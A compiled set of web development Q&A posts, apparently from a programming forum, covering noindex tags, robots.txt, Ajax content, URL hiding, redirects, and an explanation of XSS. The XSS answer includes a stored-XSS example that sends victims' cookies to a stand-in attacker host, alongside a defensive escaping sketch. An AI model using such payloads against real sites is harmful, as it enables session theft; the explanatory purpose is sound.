Prevent Search Engines from Indexing a Web Page - html

I have a members control panel page which I don't want search engines to index.
I did the following:
The page is secured: if no session or password is provided, the user is redirected to the main page. The redirect is done as follows:
header("Location: HOME PAGE");
exit();
I also put a single meta tag on the page with the following attributes:
name="robots" content="noindex,nofollow"
Is this solution good enough?

If the page is secured, its content cannot be indexed. Even if it could be, its content would be rated low.
How do you redirect the user? Using a response header, or an HTML meta redirect / JavaScript?

You can use robots.txt. For more info, see http://www.google.com/support/webmasters/bin/answer.py?answer=156449

The metadata is irrelevant: if the page redirects any unidentified user to a different page, then the redirecting URL will never be indexed.

Most search engine robots (all legitimate ones) will respect this instruction. However, all you have really done is ask the robot nicely not to index your page. It does not force any sort of behaviour, merely requests it.
You could...
Require auth to view the page. The robots will not be authenticated, and therefore cannot view the page to index it.
Return a 404 error to any request whose User-Agent string matches a list of known search engine robots (sketched below). There are plenty of sites out there (such as this one) that will easily let you compile such a list.
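A minimal PHP sketch of the second option (the User-Agent substrings below are illustrative, not an exhaustive list):
<?php
// Illustrative list of crawler User-Agent substrings; extend as needed.
$bots = array('Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider');
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
foreach ($bots as $bot) {
    if (stripos($ua, $bot) !== false) {
        header('HTTP/1.1 404 Not Found'); // pretend the page does not exist
        exit();
    }
}
// ...normal page code continues here for everyone else...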

Related

XSS: Rewrite the content of the HTML page?

Regarding XSS, OWASP states (intro paragraph):
These scripts can even rewrite the content of the HTML page
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their HTML files, which clearly no user without specific server access can do.
If I cannot do it as a user, how can a maliciously injected script from facebook.com, executed by my browser, possibly rewrite the contents of facebook.com?
As a user, I cannot rewrite the contents of facebook.com
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for use in an HTML context are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
That would require me to permanently alter their HTML files, which clearly no user without specific server access can do.
No: you could simply modify the page client-side once your malicious script is loaded. There is no need to modify the original files on the server to achieve the effect of wiping out the page. For example, this single line blanks the entire document:
document.body.innerHTML = '';
Let me give an example. Let's imagine Facebook lets its users save a link to an externally hosted avatar on their profile, and that this avatar is shown next to the user's nickname. Let's also imagine that Facebook does not protect itself against XSS (in reality it does, but we need this assumption).
An attacker could then supply the following text instead of an avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying the avatar might then look like:
<img src="javascript:alert('You are hacked')">
The attacker will then see that alert when he opens his own profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. If the attacker writes a post, all his friends will see the alert on their news feed page.
And finally: instead of an alert, the attacker can grab each user's Facebook cookies and send them to his own site:
<script>window.location = 'http://attackerssite.com/?cookie=' + document.cookie;</script>
He can then collect the victims' cookies from his server's access log. Now it is a real hazard, do you agree?
Note: what I described here is stored XSS, probably the most dangerous type because it can affect many users at once. The other types of XSS (described in other answers to this question) affect only the current user - but that doesn't mean they are not dangerous: they can steal the user's cookies just as well.
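For completeness, the defence against the stored XSS above is the escaping mentioned earlier: encode user-supplied text before inserting it into HTML, and validate URLs separately, since escaping alone does not neutralise a javascript: scheme. A minimal PHP sketch ($nickname and $avatar_url are hypothetical user-supplied values):
<?php
// Escaping renders injected markup as inert text rather than executing it.
$safe_nick = htmlspecialchars($nickname, ENT_QUOTES, 'UTF-8');
// URL attributes additionally need scheme validation: reject anything
// that is not plain http(s), falling back to a hypothetical default.
if (!preg_match('#^https?://#i', $avatar_url)) {
    $avatar_url = '/images/default-avatar.png';
}
$safe_url = htmlspecialchars($avatar_url, ENT_QUOTES, 'UTF-8');
echo '<img src="' . $safe_url . '" alt="' . $safe_nick . '">';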

How to keep the search engines away from some pages on my domain

I've built an admin control panel for my website. I don't want the control panel app to end up in a search engine, since there's really no need for it. I did some research and I've found that by using the following tag, I can probably achieve my goal:
<meta name="robots" content="noindex,nofollow">
Is this true? Are there other, more reliable methods? I'm asking because I'm scared I could mess things up if I use the wrong method, and I do want search engines to index my site, just not the control panel...
Thanks
This is true, but on top of that, for extra safety, you should set this in your .htaccess file (requires mod_headers):
Header set X-Robots-Tag "noindex, nofollow"
And you should create a new file in the root of your domain, named robots.txt, with this content:
User-agent: *
Disallow: /
And you can be sure that they won't index your content ;)
Google will honor the meta tag by completely dropping the page from its index (source); other crawlers, however, might simply decide to ignore it.
In that particular sense the meta tag is more reliable with Google: if you rely on robots.txt alone, any external page that explicitly links to your admin page (for whatever reason) can still make the URL appear in Google's index (though without any content, which will probably result in some SERP leeching).
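If the control panel is served by a script rather than static files, the same header can also be sent from the application itself instead of from .htaccess; a minimal PHP sketch:
<?php
// Per-response equivalent of the .htaccess rule shown above.
header('X-Robots-Tag: noindex, nofollow');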

Prevent google from indexing ajax loaded content

On our site we load identical content via Ajax calls (when users click on the menu), just to avoid reloading the entire page and so improve the user experience.
This works well, but the Ajax-loaded content is effectively a copy of the original content.
Can I prevent Google from indexing this content?
http://dinox-h.hu/en/gallery.php
In the left menu you can see the links. For example:
http://dinox-h.hu/puffer_tartalyok_galeria.php?ajax=1
Try adding the following on your Ajax-delivered pages:
<meta name="robots" content="noindex,nofollow" />
This tells crawlers not to index the page or follow its links. You could also add the pages to robots.txt, like this:
User-agent: *
Disallow: /*?ajax=1
That would block any URL with ?ajax=1 from being indexed (providing a robot honours your robots.txt). A better solution would also involve creating a sitemap and telling various search engines about it.
Edit
A better way of delivering Ajax content IMO would be to send the following header when requesting your pages via Ajax:
X-Requested-With: XMLHttpRequest
jQuery sends this header by default, so provided you check for it on the server side, you can deliver your usual content without the surrounding template. You can then very easily deliver different content from the same URL depending on the type of request, as sketched below. This should also solve your crawling issue, as I doubt a crawler would stumble across the Ajax version.
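A minimal PHP sketch of that server-side check (render_fragment() and render_full_page() are hypothetical helpers standing in for your own templating code):
<?php
// jQuery adds the X-Requested-With header to its Ajax requests by default.
$isAjax = isset($_SERVER['HTTP_X_REQUESTED_WITH'])
    && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest';
if ($isAjax) {
    render_fragment();   // hypothetical: just the content, no template
} else {
    render_full_page();  // hypothetical: content wrapped in the template
}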

Hide the file name in the URL

What is the best method of hiding the file name in the URL from the developer's side (with no control over the server)? For example, if the site is www.123.co.za/contact.htm, I want the user to see only www.123.co.za. An example of this can be seen at http://www.groupon.co.za.
Ways I know of are using one page and dynamically loading page content using Ajax,
or using frames.
(Server options like mod_rewrite I can't use, as I don't have access to or control over the server.)
They are using index pages. That means they have a page such as index.html, index.php, or index.aspx, etc. All you have to do is create a directory (for example, 'contact') and put a file named 'index.html' within that directory. Then you can view www.123.co.za/contact/index.html as www.123.co.za/contact. Note that your allowable index page names may vary. If index.* doesn't work for you, contact the host and ask (sometimes it's default.*).
The catch to this method is that your page is now viewable at at least three URLs (www.123.co.za/contact, www.123.co.za/contact/, and www.123.co.za/contact/index.html). This can hurt your site in search engines, as you may get penalized for "duplicate" content. You could solve this issue with mod_rewrite, but seeing as you can't use that, you can't prevent the aforementioned scenario.

When redirecting users from a legacy website to the new one, what is the best way to detect whether or not to show them a custom welcome message?

Say you have a legacy website running on an old code-base that offers certain functionality. The successor website is up and running, providing all the old functionality and more. For some time, there has been an HTML link on the old site pointing to the new one, for those users that care to click over.
Now, the legacy site is reaching its end of life, and you want to automatically redirect users to the new site, for example via a 301 or 302 redirect. However, when a user encounters this redirect, you want to also display a friendly message on the new site welcoming them and explaining why they are not seeing the old version.
When the user clicks an HTML link, the HTTP_REFERER header is populated, and the welcome message can be triggered from that value. However, it appears that the same is not true when using 3XX redirect codes.
The top Google hit for this issue has this to say:
"HTTP 1.1 specification states it clearly: if a 3XX code is given, no
Referer value is passed. (eventualy, the URL that pointed to 3XX site)."
(http://www.usenet-forums.com/apache-web-server/37811-how-set-referer-redirect.html#post145986)
However I could not find this statement in a quick read through the spec (https://www.rfc-editor.org/rfc/rfc2616).
Can anyone suggest the proper way to achieve this functionality?
Note: This is not meant to be an all-encompassing solution. We understand that some clients don't even send the HTTP_REFERER header for privacy reasons, but for the sake of argument, let's ignore that use case.
First, this should be a 301, not a 302, redirect: your redirection is permanent, so you want to indicate that. As to how to signal the redirect, just add a parameter to the URL: instead of redirecting to http://www.newsite.com, redirect them to http://www.newsite.com?FromOldSite=Y
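A minimal PHP sketch, assuming both sites run PHP (the URLs are the placeholders from above):
<?php
// On the old site: permanent redirect, flagged with a query parameter.
header('HTTP/1.1 301 Moved Permanently');
header('Location: http://www.newsite.com?FromOldSite=Y');
exit();
And on the new site:
<?php
// On the new site: show the welcome message only when the flag is present.
if (isset($_GET['FromOldSite']) && $_GET['FromOldSite'] === 'Y') {
    echo '<p>Welcome! The old site has permanently moved here.</p>'; // hypothetical message
}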
Could you just redirect them to a specific launch page? Like if they try to visit http://oldsite.com/desired/page, just send them to http://newsite.com/welcome?nextpage=/desired/page. The welcome page could show the message and then pass them over to the content. Alternatively, you could send them right to the new page with a ?show_welcome=true in the URL.
Not sure how you plan to redirect your users, but if you don't want to "ugly" up your URL, you might just set your own custom header when hitting the old site and then check for it at the new one.